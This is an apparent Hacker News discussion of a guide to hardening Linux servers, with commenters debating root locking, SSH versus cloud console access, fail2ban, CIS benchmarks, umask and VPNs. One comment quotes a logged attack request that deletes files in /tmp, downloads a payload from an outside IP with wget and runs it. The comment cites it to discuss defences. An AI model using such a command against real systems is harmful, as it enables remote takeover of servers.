The Reluctant Sysadmin's Guide to Securing a Linux Server (pboyd.io)
331 points by WallyFunk on July 30, 2023 | 116 comments


There's a reason guides like this are a dime a dozen - there is no way to generalize server configuration this broadly.

But as long as we're doing it anyway - the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

Perhaps one ought not take sysadmin advice from a blog post with a first sentence that reads "I’m not a sysadmin, and I don’t want to be".


The biggest rule about securing things is: don't be in security. Just do your due diligence to put your hosts several layers away from public access and make all images and containers hardened with no elevated permissions. Sure, vulnerabilities will still exist... but if the only thing that can access the container is through a narrow proxy, you are not going to get some dumb levels of attacks on your systems.

AWS allows you to ssh into your hosts from within AWS. You just manage that security. NO ONE needs public ssh access, no one needs VPN ssh access, just AWS ssh access. DON'T OVERCOMPLICATE THINGS!

I agree with you. I am not gonna say don't follow a systems engineer's advice. I say follow everyone's advice but pick out the things that seem most reasonable. If it is extra work then you're doing it wrong; simplify everything so that issues get resolved faster. Faster resolution means faster security fixes.


I'm also a "non-sysadmin" like the OP. I'm much more casual than you are:

1. Install LTS server with a sudo admin user and complex password (yes, password, not key. I still end up using keys for backup automation because it's easier.)

2. apt install fail2ban. Don't even need to configure it: its default configuration will auto-ban any IPs trying to brute-force SSH.

3. apt install unattended-upgrades (nowadays installed by default)

I'd like to see anyone hack that.
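In shell terms, a rough sketch of those three steps on a fresh Debian/Ubuntu install (the username is just an example):

  # 1. sudo-capable admin user with a (strong) password
  adduser admin && usermod -aG sudo admin

  # 2. fail2ban: the default jail already covers sshd brute-force attempts
  apt update && apt install -y fail2ban

  # 3. unattended-upgrades: install and enable periodic security updates
  apt install -y unattended-upgrades
  dpkg-reconfigure -plow unattended-upgrades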

You mention running containers with no elevated permissions. I've taken a liking to Docker because, in addition to its many benefits, it lets me separate MY processes from those of the OS. It's just so simple when I can identify the server's running services with "docker ps". I'm curious, when was the last time a Docker exploit could escape the container and modify the host? I read it happened in the early days of Docker but is that still a risk? They would need to: a) exploit a bug in a service you're relying on (eg nginx), b) use the former bug to exploit a bug in Docker, c) defeat the Linux kernel's namespace/cgroup isolation. Is that a realistic threat in 2023?


Always a threat if a host container is on the same HV. You get all sorts of bleed bugs identified every other year; literally the last one was a few months ago, I think. None as large-scale as when it first happened.


When you say "no one needs vpn ssh access" vs "AWS ssh access", what is the difference between the two?


The consoles at big hosts typically require good 2fa to log in to the web management console, which typically can open a command line on the instance. This is a nice authN layer.


Note that it's possible to configure multi-factor authentication using e.g. one-time passwords (OTP) for those regular openssh logins. The setup to achieve that still seems quite involved though, so the reluctant sysadmin in me hasn't got around to trying it.

Multiple factors:

1FA: Password(1F) OR private key (password blank)(1F)

2FA: Private key(1F) with password(2F)

MFA: Private key(1F), w/ password(2F) AND OTP(3F)
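For the record, a minimal sketch of the key + OTP setup on Debian/Ubuntu using the libpam-google-authenticator module (newer OpenSSH spells the option KbdInteractiveAuthentication instead of ChallengeResponseAuthentication; details vary by release):

  apt install libpam-google-authenticator
  google-authenticator        # run as the login user, scan the QR code

  # /etc/pam.d/sshd -- add (and consider commenting out "@include common-auth"
  # so you are not also prompted for the account password):
  auth required pam_google_authenticator.so

  # /etc/ssh/sshd_config -- require key AND OTP:
  UsePAM yes
  ChallengeResponseAuthentication yes
  AuthenticationMethods publickey,keyboard-interactive

  systemctl restart ssh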


And have to use their shitty webui?

Ssh has 2fa options if that's the real reason.

Fwiw, this guide also suggests setting up a wg connection which is no better than ssh, and probably worse in some ways.


It doesn't need to be through the web UI, it can be done through the cli.

https://docs.aws.amazon.com/systems-manager/latest/userguide...

Google Cloud has a similar gcloud compute ssh instance-name command, and I imagine there's a similar one on Azure.
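Roughly, with a hypothetical instance ID/name (the AWS variant needs the Session Manager plugin for the CLI, plus the SSM agent and an instance role on the host):

  # AWS: shell session brokered by Systems Manager, no inbound port needed
  aws ssm start-session --target i-0123456789abcdef0

  # GCP: SSH tunneled through Identity-Aware Proxy
  gcloud compute ssh my-instance --tunnel-through-iap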


That's ssh?


There are massive differences between using this and throwing some keys on a server and opening 22. These systems use the cloud provider's proxying and authz/authn to dynamically grant access.

One could have a box with no public IP and no open ports and still use this to connect.


Cloud providers proxying?

Via ssh? With an SSH key? Over port 22?


> Via ssh?

No, through their in-house proxy tools such as Session Manager or Identity Aware Proxy or whatever Azure has.

> With an SSH key?

Not at the edge, and not an SSH key you manage. A dynamically generated one managed by the cloud provider which exists just for that session. So, not really, not like you're thinking.

> Over port 22?

For the tunnel? No.


As mentioned you then just need to lock down AWS, rather than AWS AND outside access to servers via VPN. Lessen the attack surface.


The console in AWS allows access within its system. There is no point in increasing the access area to the hosts: the more surface area, the easier it is to be penetrated by ssh vulnerabilities. You also shift fault to AWS rather than your company and team. You did your diligence; you just have to manage access control and nothing more. If AWS has a security breach, that access to your systems is completely on AWS and you can demand compensation.

What you want to do is avoid fault, improve tolerance, but extend liability to the provider.


> AWS allows you to ssh into your hosts from within AWS.

This is where your argument breaks down IMHO. Unless you are saying "don't expose port 22 to the world...", which is a common (small) part of security-in-depth.

> You also shift fault to AWS rather than your company and team. You did your diligence; you just have to manage access control and nothing more. If AWS has a security breach, that access to your systems is completely on AWS and you can demand compensation.

This appears to be an instance of the "appeal to authority"[0] fallacy and is of little solace should server(s) one is responsible for become compromised.

0 - https://en.wikipedia.org/wiki/Argument_from_authority


You still have to do your diligence. You established what is supposed to be a secure system, yet that system failed due to provider security. AWS is far more staffed than any other company, so why wouldn't you shift left to AWS? Why would you hire a fleet of security engineers to do what AWS has already established? You are breaking convention, reinventing the wheel, and complicating an already simple system.

This isn't a fallacy; it is reducing a business's cognitive load.


> You still have to do your diligence.

My point exactly.

> You established what is supposed to be a secure system, yet that system failed due to provider security.

This makes no sense. By your own recommendation, "provider security" is an AWS offering.

> AWS is far more staffed than any other company, so why wouldn't you shift left to AWS? Why would you hire a fleet of security engineers to do what AWS has already established?

What does Amazon's staffing have to do with best practices when securing a server deployed on their platform? Who said anything about "a fleet of security engineers"? How does any of that relate to securing that which one constructs, and ultimately is responsible for, when using said hosting services?

> You are breaking convention, reinventing the wheel and complicating an already simple system.

Are you saying that your original statement of "You also shift fault to AWS rather than your company and team" is somehow an accepted convention?

And what wheel did I "reinvent"?

Finally, was my identification of the common practice which is moving sshd off of port 22 the complication to which you refer?


Yeaaah, you're trying to poke holes. The problem is that there are larger holes in a network if you're setting up and safeguarding a VPN just so you can SSH. SSH, if it's even needed at all, should be moved to the provider's secured tools.

https://aws.amazon.com/blogs/compute/new-using-amazon-ec2-in...

I really don't recommend extending responsibility for creature comforts. However you want to do this, so be it.

> This makes no sense. By your own recommendation, "provider security" is an AWS offering.

Are you stating your system is infallible? So why would you want to bear the infallibility claim and not shift it to the company providing it?

> What does Amazon's staffing have to do with best practices when securing a server deployed on their platform? Who said anything about "a fleet of security engineers"? How does any of that relate to securing that which one constructs, and ultimately is responsible for, when using said hosting services?

Tooling takes a team to support it. You think every company can afford a team to manage that tooling? And why should they? Not all businesses are tech companies, but they still need a digital footprint. They need to be self-conscious and choose provider practices to get the most out of them.

> Are you saying that your original statement of "You also shift fault to AWS rather than your company and team" is somehow an accepted convention?

Providers own the responsibility for their technology. In terms of failure: if access is correctly configured and managed, yet their technology fails, they owe your business; it is very simple.

> And what wheel did I "reinvent"?

Implementing old security practices. Why wouldn't you move to better practices and prevent larger holes in your network? Companies often get into this repetitious cycle of reimplementing or reinventing existing tools and technology just to manage access, especially ssh. The convention of using a cloud platform is to use a cloud platform's security access, not some sketched up VPN and SSH system.


This sums it up, "The convention of using a cloud platform is to use a cloud platform".

If you rent compute space, then you trust them to responsibly use the hypervisor instead of snooping. Whether you trust that or not, you are all in and may as well cement over the external port 22.


10000% on the money.


> Yeaaah you're trying poke holes.

No, I am trying to remind you of the topic which was under discussion. To wit:

  The Reluctant Sysadmin's Guide to Securing a Linux Server
> Are you stating your system is infallible?

  A straw man fallacy (sometimes written as strawman) is the
  informal fallacy of refuting an argument different from
  the one actually under discussion, while not recognizing or
  acknowledging the distinction.[0]
> Tooling takes a team to support it.

See above quote.

> You think ...

You do not know what I think nor my experiences, so please do not be so arrogant as to assume so.

>> And what wheel did I "reinvent"?

> Implementing old security practices.

Again, please refer to the *article under discussion*. In the event it remains unclear, I will restate its title:

  The Reluctant Sysadmin's Guide to Securing a Linux Server
> Why wouldn't you move to better practices and prevent larger holes in your network?

See previous strawman definition and link below.

> Companies often get into this repetitious cycle of reimplementing or reinventing existing tools and technology just to manage access, especially ssh. The convention of using a cloud platform is to use a cloud platform's security access, not some sketched up VPN and SSH system.

Again, see previous strawman definition above and link below.

Note that the only ssh-related recommendation I proffered was:

  Unless you are saying "don't expose port 22 to
  the world...", which is a common (small) part of
  security-in-depth.
This is a well-known, albeit very small and insufficient by itself, part of helping to reduce attack vectors.

As to "sketched up VPN and SSH system", I have no idea as to what you are referencing. Perhaps this is a recollection of a previous engagement wherein decisions made remind you of a bad situation similar to, but different than, this?

HTH

0 - https://en.wikipedia.org/wiki/Straw_man

EDIT: corrected spelling from "waas" to "was"


A strawman argument is sometimes used to draw out a point. You cannot confidently say your security solution is infallible, nor should you. The article is just a good runbook of things and less a guide. But if you are working in the cloud you shouldn't go using old management methods as if they belong in your network.

You would not believe how many companies are dependent on patching users through VPNs in order to access remote hosts. I mean, some have to because there is no other solution, like those managing their own on-prem. I would kind of be interested in AWS-style access management capable of being implemented on-prem.


McDonalds employs the most cooks. They must have the best food.

Staffing count doesn't guarantee quality.


> Perhaps one ought not take sysadmin advice from a blog post with a first sentence that reads "I’m not a sysadmin, and I don’t want to be".

That's just perfect.


That sounds reasonable, from a "passion" angle.

However, I would like to hear what someone who dislikes sysadmining but must anyway has to say. Why? A different perspective. I know some sysadmins who "left the car up on blocks," as in, they couldn't stop tweaking and fixing and so on, and they love that, and that's great.

Someone who is forced into the job, however, is communicating to me what I would expect to be the most necessary tasks. Maybe I also am in a similar place and would like to get on with the rest of my job. And in an Agile world, programmers get pushed into sysadmining ... at least, in some versions of Agile to which I have been subjected.


> However, I would like to hear what someone who dislikes sysadmining but must anyway has to say. ... Someone who is forced into the job ...

The only way a job is done consistently well is by those who want to do that job well consistently.

HTH

EDIT: added missing "do" verb.


Too bad.

Sometimes a business can't or won't hire a real sysadmin. The people forced into the job need guides just as much.


> Too bad.

> Sometimes a business can't or won't hire a real sysadmin. The people forced into the job need guides just as much.

I was making a more general statement regarding people having to do tasks they don't want to do, even if they have the skills to do them. Which makes resources helpful to "people forced into the job" rather difficult to produce.

How can one make a guide to assist people to be successful in something they don't want to do in the first place?


> the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

That's not a unique or novel insight. For the case where your system gets borked (whether by yourself, your hardware, or your cloud provider), you need a plan in advance:

1. How can I access the data the server has or how much of it can I afford to lose?

2. How do I get a replacement running within a time window acceptable for my usage?

The answers will be very different depending on your use case. But how you locked the root user has very little impact on them.

Booting into another environment is always one option in my plan so locking the root user doesn't frighten me.


"the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment."

As a dev, I say that's a good thing. I've administered my own systems for decades and helped in small startups where we had no full-time admin, so I'm definitely not new to administering Linux.


> the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

As opposed to borking the root user and being equally locked out? Assuming your sudo config is a "configure it once and then leave it forever" deal - which seems common IME - I can't see any way it would be different.

(Mind, this cuts both ways - once you force only key-based SSH, I generally don't see a problem with direct root access either.)
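For reference, the sshd_config lines for that stance would look something like this (a sketch, assuming the usual /etc/ssh/sshd_config):

  PasswordAuthentication no          # keys only
  PermitRootLogin prohibit-password  # direct root allowed, but never with a password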


Just don't set root:toor and you'll be alright. Keys are good, but passwords are good as well.


You shouldn’t need root, you should have another person with admin rights as a backup plan.

It is a VM, so if you do something that would break sudo or all your users, you should have a VM snapshot at your fingertips, ready to restore from the AWS interface.

Even if you are running bare metal you should set up snapshots first, but nowadays hardly anyone runs bare-metal web servers; it is still some hypervisor with a bunch of VMs that are easy to back up, restore, or just delete and create fresh.


> You shouldn’t need root, you should have another person with admin rights as a backup plan.

What?

I am the only admin on about a dozen machines. I'm not outsourcing that to a friend. That trust model is much more flawed than separation of duties and permissions segmentation as part of my administration routine.


What happens if you get hit by a bus, or become otherwise incapacitated?


That's what a dead man's switch is for. All of my credentials will be shared after a specified period of time.


Your manager or company owner should have an admin account then; he should not use it for anything besides disaster recovery.

If you are single person shop that is your choice, have a root account or whatever you feel like having.


That's not true. It's not obvious what user you have that could do sudo. Thus it does improve security. I advise the same in my book (Deployment from Scratch) and I suggest that for both the host system and containers. There is little cost to not primarily using root.


>> But as long as we're doing it anyway - the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

> That's not true. It's not obvious what user you have that could do sudo. Thus it does improve security. I advise the same in my book (Deployment from Scratch) and I suggest that for both the host system and containers. There is little cost to not primarily using root.

It is true. To ensure root cannot be used when ssh'ing into a server, set "PermitRootLogin" to "no" in sshd_config (as mentioned in the OP).

Locking out root entirely, as further mentioned in the OP and suggested by your comment, does nothing to increase security regarding remote penetration attacks. Furthermore, should a non-root account which has sudo privileges be compromised, an argument could be made that having a functional root account with its own password accessible only locally and not enabling sudo is a more secure approach.

Either way, having a root account which can only be used locally ensures there is a recovery workflow should one be needed, as the GP enumerates.
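Concretely, the approach being described is roughly this (a sketch, not a full recipe):

  # /etc/ssh/sshd_config -- root can never log in over SSH
  PermitRootLogin no

  # keep the root account usable at the local/serial console for recovery,
  # i.e. set a password rather than locking the account:
  passwd root        # rather than: passwd -l root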


I would instead suggest the official guide: the Securing Debian Manual <https://www.debian.org/doc/manuals/securing-debian-manual/>


Please note that this official guide is more than 6 years old. It means a large part of its content is obsolete.

For instance, the chapter on web servers is far from today's best practices. It only mentions Apache httpd (nowadays Nginx is much more widespread), gives advice about a default configuration which is no longer the default, and mentions a path that has changed in recent Debian installs. Even considering its age, the quality of this chapter is dubious: it forgets important points, like disabling .htaccess and directory listing, removing unused modules...

Modern tools are obviously missing from this guide: apparmor (though it was in use in 2017), nftables, systemd (unit settings that prevent /home access, prevent privilege escalation, etc)...


I read a bit more of this "official guide", and I'm surprised Debian hasn't deprecated it. Parts are still valuable today, but others are meaningless, and a few should be avoided.

From the changelog, the document had one minor update in 2017 and one in 2013. It was mostly written in 2001-2007. Much has changed over the last 15 years.


It might be a bit corporate now, but a few years back I found the security aspects of the Red Hat admin training to be decent enough for most folk.


The article was explicitly targeted at “Debian 11 (Bullseye) or Ubuntu”.


It's weird to begin such an exercise without stating what the point of "the server" is supposed to be. Is it a ... web server? Interactive unix logins for developers? Mail relay? What does it do? This is the key point of the analysis because "securing" a server consists in making it incapable of doing anything not in the set of things it is meant to do. Notably, starting from this side of the problem can lead you away from "standard machine image". Starting with a kitchen-sink Linux distro like Ubuntu is not the road to hardness.


It's really not weird, that's not how security works.

What the application is doing is relevant to application security, but the whole point of securing the OS is to eliminate the necessity for "trusting" the application.

When you are securing an operating system, you must assume the application that is exposed to the operating environment (be that the internet, local LAN, even simply user logged into the workstation in the case of a GUI or CLI app) is compromised.

The primary goal of most security measures is preventing and detecting privilege escalation and lateral movement within the OS or network.

There are a lot of best practices that apply in general to securing an operating system. If you want to dig deeper, one of the best resources for this information is provided by CIS (Center for Internet Security).

CIS has hardening standards for most OSes, yes, even including Ubuntu. https://www.cisecurity.org/benchmark/ubuntu_linux

These are standards that many security conscious organizations apply to their servers. The US government takes it a step further with DISA's STIGs.

DISA STIGs are similar to CIS's benchmarks, but result in an even more locked-down environment and place extreme restrictions on which crypto libraries are allowed to be used.

In short, securing the OS is a standard best practice that all organizations should be doing. Unfortunately most startups lack engineers with the expertise in building custom linux images so a lot of folks are quite unfamiliar with hardening procedures.

You should absolutely NOT use a non-standard OS because you think it will be more secure. It's a much better idea to use known industry-standard security benchmarks on supported Linux distributions than to try to bake your own standard on some non-Debian/RHEL-based distro.


IME the checklists and guides can be a useful resource but are mostly "cover your a$$" documentation, often falling into cargo cult suggestions just to add more check-boxes.


You must be using the wrong 'checklists' (they aren't checklists, they are implementation guidelines). CIS benchmarks and DISA STIGs provide concrete actions that lead to a more secure system. Sure some of them might not apply specifically to your environment, but in general they are an excellent starting point.

Some of the line items can be a bit arcane or not as relevant in cloud environments, etc... but that's a far cry from calling them CYA.

Nothing cargo cult about enabling SE Linux, restricting access with IP tables, configuring AuditD and AIDE.


> Nothing cargo cult about enabling SE Linux, restricting access with IP tables, configuring AuditD and AIDE.

These are great ways to massively overcomplicate your system. Generally speaking, having encountered these tools, do not use them unless you're willing to dedicate about 2x the time you would otherwise spend administering the system.


Just because you had difficulty does not mean you should give such advice to others. There is nothing difficult about configuring any of these systems if you know what you are doing.


Time consuming & tedious & error-prone != difficult.


I'm still not sure how disabling the crypto algorithms that the NSA prefers not to break helps us stay more secure...


If a single line item that seems irrelevant to you makes you think the whole process of security hardening is useless, you are a fool.

Frankly you sound like the tired BOFH trope, if you don't see the benefits of security hardening I hope you are never responsible for anything important infrastructure wise in your organization.


The second sentence

> But I write software for the web

I'm going to guess it's a web server but it's just a guess.


2nd and 3rd sentence

“ But I write software for the web, which means I’m never far from a server, and sometimes I’m the only one around.

So even if I didn’t want the job, I have it, and I need to take the security of these hosts seriously.”

Basic Linux server hardening is not a bad idea or skill to learn. Learning the basics manually helps feed into understanding and using higher-level solutions.


100%

As long as you are using Debian, RHEL, Ubuntu, or CentOS implementing a basic minimum security baseline is as simple as following the CIS or DISA STIG guides for your OS.

There are plenty of scripts on GitHub that do this (AUDIT THEM FIRST), or you can even just use premade images from CIS in the cloud provider of your choice.


Almost every server sits on the internet and has one or two (sometimes a couple more) ports open, listening for their app's internet traffic.

What the traffic is seems irrelevant to 99.99% of servers out there, imo. Yes there's some questions of what deployments look like and what capabilities operators have but those are details outside the general concern of being safely online. IMO.


> Almost every server sits on the internet ...

Nope. Not by a long shot.

> What the traffic is seems irrelevant to 99.99% of servers out there, imo. Yes there's some questions of what deployments look like and what capabilities operators have but those are details outside the general concern of being safely online. IMO.

The following vulnerability listing, just for the week of 2023-07-17, proves otherwise:

https://www.cisa.gov/news-events/bulletins/sb23-205


> Almost every server sits on the internet

I'm going to counter that the overwhelming majority of hosts in existence do not, in fact, "sit on the internet".


Ideally the traffic would be siphoned thru a load balancer/reverse proxy of some kind rather than the dest service endpoint/port being directly exposed to the internet


Sure. But everyone else here was talking about servers. Which, you know,... serve. Are in some way on the internet.


Hosts and servers are in the above case the same thing. And servers can also "serve" on a local LAN; no internet required.


I actually disagree with most of this. I think that, for servers, it's best to stay as close to the "cattle, not pets" model as reasonably possible. Servers should be set up and maintained with automated tooling and rarely connected to manually, preferably only to debug issues. Most of the things in here are gimmicky one-offs that don't meaningfully increase security.

Don't bother setting up a user account, use a public key authorized SSH session as root to do everything. Setting up UFW to block everything but what you should be serving is good. I don't see much point in things like Wireguard or this umask thing.
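A minimal UFW policy along those lines, assuming a plain web server on 80/443 and SSH on 22:

  ufw default deny incoming
  ufw default allow outgoing
  ufw allow 22/tcp    # or drop this if you only use the provider's console
  ufw allow 80/tcp
  ufw allow 443/tcp
  ufw enable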


What should one do when it is not possible to handle the servers as cattle, because there are 200 unique servers which different people have to connect to and do different things with, like at a university or other academic places?


Sibling is snarky but correct.

I don't think your situation has anything to do with what I described. It may still be linux, but it strikes me like saying that the maintenance manual is different between a sports car and a dump truck. Well yeah, obviously.

Bad though I think the original article might be, it would be 10x worse to attempt to write the reluctant sysadmin's guide to triple-digit workstation clusters in a university environment. Nothing about best practices for production web servers will apply for that, you need to hire an actual sysadmin.


Hire sysadmins


> If you’re on Windows, PuTTYgen should work

If you're on Windows you can `wsl --install` and work with Linux (e.g. Ubuntu 22.04).

You can also install Git Bash which comes with ssh and ssh-keygen.

Either way, same instructions.
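The key generation itself is identical in all three; for example (the comment string is arbitrary):

  ssh-keygen -t ed25519 -C "me@laptop"
  # then append the contents of ~/.ssh/id_ed25519.pub
  # to ~/.ssh/authorized_keys on the server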


And on up-to-date versions, OpenSSH client and tools are available from powershell or cmd.


You can also install the Microsoft port of OpenSSH on older versions yourself.


> GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.231/jaws;sh+/tmp/jaws

in the case of a successful attack, some questions to ask could be:

- why did they manage to use wget?

- why {apache,nginx,postfix,exim,sendmail,...} is allowed to use wget, or curl, or nc or bash (or ...)?

- why is wget, curl, nc, telnet, .. installed on the server? can they be uninstalled? especially (!!) if it's a container.

- why did they manage to execute files from /tmp, or /var/tmp, or /dev/shm? do these directories need write access for "others" or can they be mounted with "noexec"?

- ufw/iptables/nftables won't stop local binaries from opening outbound connections, how would you stop outbound connections by binary, path, etc?

- if they managed to wipe the logs, how could you have known all the commands they executed? could auditd+grafana (just an example) have helped here by sending logs to a remote server?
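Some of these can be addressed declaratively; for example a noexec /tmp plus a systemd hardening drop-in for the web server (the unit name is illustrative, and ProtectSystem=strict will usually need ReadWritePaths= for log/cache directories):

  # /etc/fstab -- mount /tmp without exec/suid/dev
  tmpfs  /tmp  tmpfs  defaults,noexec,nosuid,nodev  0 0

  # /etc/systemd/system/nginx.service.d/harden.conf
  [Service]
  NoNewPrivileges=yes
  PrivateTmp=yes
  ProtectSystem=strict
  ProtectHome=yes

  # then: systemctl daemon-reload && systemctl restart nginx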


I agree with your questions to be asked if an attack succeeds but...

> ufw/iptables/nftables won't stop local binaries from opening outbound connections

Wait... Of course iptables/nftables can be used to prevent anything local from opening outbound connections. You can, say, easily have a firewall which only allows "NEW" inbound traffic on either port 22 or 443.

They're called stateful firewalls for a reason.

For example, on Debian you could configure the firewall so that the only user allowed to emit new traffic to get updates is the (/nonexistent:/usr/sbin/nologin) user "_apt".

And for all those (not you) talking about the "cattle vs pet" thing, all this can be automated by hardening scripts you run exactly once, once you set up the server.

It's not because there are guides out there that every step in these guides has to be done manually each time you configure a new server.
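A sketch of that _apt idea with iptables (append the accept rules before switching the policy so you don't cut your own session; persisting the rules, e.g. with iptables-persistent, is a separate step):

  iptables -A OUTPUT -o lo -j ACCEPT
  iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
  iptables -A OUTPUT -p udp --dport 53 -j ACCEPT   # DNS
  # only the _apt user may open new HTTP/HTTPS connections (for updates)
  iptables -A OUTPUT -p tcp -m multiport --dports 80,443 -m owner --uid-owner _apt -j ACCEPT
  iptables -P OUTPUT DROP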


I’m a biologist and also a reluctant sysadmin. I’m happy to see I do roughly the same [0] except that I use an ed25519 ssh key and switched to Tailscale (it’s just too easy). I only open “unsafe” ports on the tailnet.

I did just install my first NixOS system so I’m indeed heading towards full automation.

[0] https://blog.hmrt.nl/posts/first_steps_arch_box/


Tailscale is so good. One of the best pieces of software I've used in a long time. It just works, and it's really good at what it does (VPNs into your private network, regardless of the route to it)


I use Wireguard and do not rely on a third party.


Wireguard is cool, Tailscale is based on Wireguard.

But Tailscale is just a 3 sec process for any new server, 0 config needed, no holes in the firewall, nothing.

But I get the argument.


The first rule of sysadmin: Have a regular schedule for testing your offsite backups of all your systems.

After that, as others have noted, create and review a threat model and use that to guide your hardening based on official guides:

https://www.debian.org/doc/manuals/securing-debian-manual/

and here's a readable introduction to the NIST STIGs:

https://cybergladius.com/nist-server-hardening-best-practice...


Reluctant sysadmin: story of my life.

Over the last 3 years I have gone from being a timid junior web dev to reluctantly and hastily becoming the guy managing the Linux web servers, keeping the operation running, and hardening it along the way.

On the one hand, the huge salary increase has been nice but on the other hand I am constantly thinking one day I'm gonna fuck it all up. I feel like I'm not doing this job any justice and that I'm way out of my element all the time.

I try to get better by reading blog posts like this and documentation and asking for advice but I just feel like an impostor all the time.

But employers are happy with the results and I guess that makes it tolerable.

So thanks for these types of guides!


Sysadmin isn't a profession you choose, it's something that happens to your life.


Except I chose it, then moved on later in life ;-)


Also configure fail2ban and enable it for ssh.

https://www.digitalocean.com/community/tutorials/how-to-prot...
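The default sshd jail generally works as installed; a small /etc/fail2ban/jail.local if you want to tune it (the values below are only examples):

  [sshd]
  enabled  = true
  maxretry = 5
  findtime = 10m
  bantime  = 1h

  # then: systemctl restart fail2ban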


I have a few things I disagree with in here and I haven't even gotten all the way through. Generally, most of this is unnecessary, and some of it is even ill-advised. The best thing you can do is enable automated updates, rely on your cloud provider's console for accessing the server, and disable all remote access otherwise. If you do this, you remove a significant number of attack vectors. Within AWS there are very good security controls you can put into place; on more generic VPS providers, at minimum you should start by running a firewall that only allows incoming and outgoing traffic on specified ports, and logging in only via key-based auth + 2FA (you can use Google Auth, Yubikey, or others to do this via PAM modules) if you must use SSH.

Most of the security issues I've encountered in my career have been in the application, and are then used to provide a pathway for further privilege escalation. If you work to sandbox your applications, such as by using hardened minimal containers w/ appropriate namespacing & sVirt, this mitigates most concerns here.

It's been trivially easy to prevent bots spamming basic SSH and HTTP attacks to every IPv4 address for a very long time.


Your comment sounds convincing at the start but..

"The best thing you can do is enable automated updates, and rely on your cloud provider's console for accessing the server and disabling all remote access otherwise."

1) I've run into too many issues letting systems auto-update. 2) Several times the AWS console (a web app, so probably not as secure as a remote Linux ssh connection in my mind) failed to work. Not just for me either; there have been multiple reports of this. My remote ssh connection was the only way I could fix it, since AWS doesn't have a remote serial console thing like Linode has (or had?).


> since AWS doesn't have a remote serial console thing

https://aws.amazon.com/about-aws/whats-new/2021/03/introduci...


You're right, I forgot EC2 got that. When Lightsail gets it, I'll consider AWS as having it.


Securing from what? This thing is pointless mid-90s advice without a threat model.


This guy gets it. Your first question should be around your threat model. Are you protecting against random scans and script kiddies or the various APTs?

Maybe then look at the MITRE ATT&CK framework, Cyber Kill Chain etc.

I really hate to suggest them, as it appears they have deviated in weird ways from their original goal of protecting critical infrastructure from cybersecurity attacks, but CISA has many relevant documents.


Meh, just do it like me: get a hardened image and container. Deploy stuff as a gold image without elevated permissions, and/or a container. Then just make sure everything is behind a proxy or intelligent load balancer that restricts any crazy input.

DONT OVERCOMPLICATE WORK

Overcomplicating work means slower response times to solving problems.


Can you give examples of hardened images?


If you are training an HN parody LLM, this is a perfect discussion to add to your training set, featuring all the canonical archetypes—including my comment among them.

The headline and post read like top shelf parody too, as if synthetically generated to summon we archetypes.


I like the changing of the default umask, although it probably shouldn't be 077.

Is acl needed over, say, chown?


No, there's no need to use `setfacl` over `chown/chmod` in the author's example.

The reason that the author uses umask 077 and ACLs is, I think, just a mindset. By using 077, the file is restricted to only the owner, and the sysadmin does not need to think about group memberships. By extending read access using an ACL, this theme is continued; additional usernames will be appended as ACLs, but no group set of usernames needs to exist.

A file named "alfred" would, presumably, only ever needed to be read by root and alfred, but that's just the narrow case for the author's scheme.


If not 077 then what?


077 is a bit too restrictive for a lot of workloads. 027 is recommended by CIS for servers and 022 for desktop.

If you are sure you can use 077 without stuff breaking, awesome, but that's not always the case. Typically on systems using 077 you will find yourself using chmod a lot.


Why not 077?


It effectively makes group ownership meaningless.

027 does a better job of keeping the model while tightening it up - world permissions are removed, users and groups are still meaningful.

This is what they're supplementing with ACLs, creating a frustrating problem of discovery by managing groups of users outside of groups

It's not necessarily wrong, I guess. There may be cases where someone wants this. ACLs are an answer, just not the one I'd suggest.

Why? Imagine 'Bob' leaves. Do you want to remove them from countless ACLs, or one group?

One is probably better off with 027, using groups, and focusing on SELinux or AppArmor. It will permit or deny things based on many things, including user context.

Bonus: it isn't limited to assets on disk. Things like gaining a shell and proxying services can be denied.


This was an informative article with an opinionated take. Don’t update the original based on feedback. It is your article on your blog. You do you.


I’d learn to run OpenSCAP with CIS and the NIST CSF to get an idea of secure operations. The former can detect and remediate a lot of the issues these types of guides are discussing.
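A sketch of what an OpenSCAP run against a CIS profile can look like, assuming the scap-security-guide (SSG) content is installed; the data-stream path and profile ID below are examples and vary by distro and release:

  # list the profiles shipped in the SCAP content
  oscap info /usr/share/xml/scap/ssg/content/ssg-ubuntu2204-ds.xml

  # evaluate the CIS Level 1 server profile and write an HTML report
  oscap xccdf eval \
    --profile xccdf_org.ssgproject.content_profile_cis_level1_server \
    --report report.html \
    /usr/share/xml/scap/ssg/content/ssg-ubuntu2204-ds.xml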

But really the idea of being successful at anything while also having no knowledge of it is kind of a farcical contradiction.

It’s like saying, look, I just want to build a rocket engine. Tell me how without all the physics mumbo jumbo.


Everyone is parroting the same thing over and over again, but no one is going into the whys. Why do this, what's the benefit, how will it thwart this or that type of attack. New books on the subject tend to collect these guides, distill them a bit, and parrot it all over again.


This notion of security is stale. Real security is far more complex than this, requiring automated provisioning and logging. This is more suitable for a VPS or a personal VM than anything professional. Also installing acl just to use setfacl bothered me.


Is there a guide to teach these reluctant sysadmins how to evaluate, plan, and choose between all these different methods?

For me, the hardest part of securing systems is usually deciding what is good enough for the current situation.


> We want a umask of 077,

No we don't. This creates problems with many packages. There's a reason for defaults and a reason not to follow cargo-culting security "recipes".


trying my best to understand the target audience for this blog post. It feels like most of these things fall somewhere in between "a sysadmin should know this" and "this might be new to a dev without much ops experience". And then, my first thought is, well if you're focused on getting software out the door your best bet is not to touch any of this stuff and deploy on a platform where configuring the Linux distro is not your responsibility. i.e. k8s or AWS ECS


WireGuard is fine, but since it's only UDP, it doesn't work well if you're connecting behind a restrictive firewall or from a network using CGNAT (many of them).

If you're a reluctant sysadmin that doesn't care, I'd recommend using Tailscale. It's wireguard without the drama, is extremely competent at piercing through almost any firewall [0], and has a great ACL system that lets you fine tune which accounts can access what.

It's also free (for now)!

[0] https://tailscale.com/blog/how-nat-traversal-works/


I don't get why a wireguard vpn to connect to ssh would be any better than just ssh directly (assuming reasonable ssh config)


